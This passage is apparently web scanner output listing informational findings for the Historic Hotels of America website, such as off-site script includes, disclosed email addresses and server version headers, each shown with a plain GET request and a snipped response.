HTTP/1.1 404 Not Found Connection: close Date: Wed, 20 Oct 2010 23:39:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:39:19 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:08 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /shop |
GET /shop HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:31 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Shop HHA, Historic Hotels of America</title> <META http-equiv=Co ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /spas_retreats |
GET /spas_retreats HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:35 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /step_back_in_time |
GET /step_back_in_time HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:38 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Step Back in Time at The Grove Park Inn, Historic Hotels of Ameri ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /taste_of_napa |
GET /taste_of_napa HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:40 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>A Taste of Napa Valley History, Historic Hotels of America</title ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /the_heathman_hotel_offer |
GET /the_heathman_hotel_offer HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:47 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Art and History Collide at The Heathman Hotel, Historic Hotels of ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /the_lenox_special_offer |
GET /the_lenox_special_offer HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:52 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>(Time) Travel to Historic Boston at The Lenox, Historic Hotels of ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /vacations_leisure |
GET /vacations_leisure HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:56 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /woodlands_inn_1906 |
GET /woodlands_inn_1906 HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:42:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:42:01 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Southern Hospitality at Its Finest, Historic Hotels of America</t ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /wort_hospitality |
GET /wort_hospitality HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:42:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:42:07 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Experience Traditional Western Hospitality, Historic Hotels of Am ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Wed, 20 Oct 2010 23:39:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:39:21 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... <a href="mailto:webmaster@historichotels ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /fckeditor/editor/images2 |
GET /fckeditor/editor/images2 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Wed, 20 Oct 2010 23:39:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:39:19 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... <a href="mailto:webmaster@historichotels ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /hotel_image.php |
GET /hotel_image.php HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 20:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /shop |
GET /shop HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:41:31 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Shop HHA, Historic Hotels of America</title> <META http-equiv=Co ...[SNIP]... <a href="mailto:dcelio@preferredhote ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /hotel_image.php |
GET /hotel_image.php HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 20:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.historichotels |
Path: | /inc_hotel_list.php |
GET /inc_hotel_list.php?hotel Accept: */* Accept-Language: en-us Referer: http://www.historichotels Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:39:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <script language="javascript"> function GetHotels() { //alert(xmlhttp //divDsp('hotel_list_a', 'none'); var x = new getObj('hotel_list_div'); x.innerHTML = xmlhttp.respo ...[SNIP]... |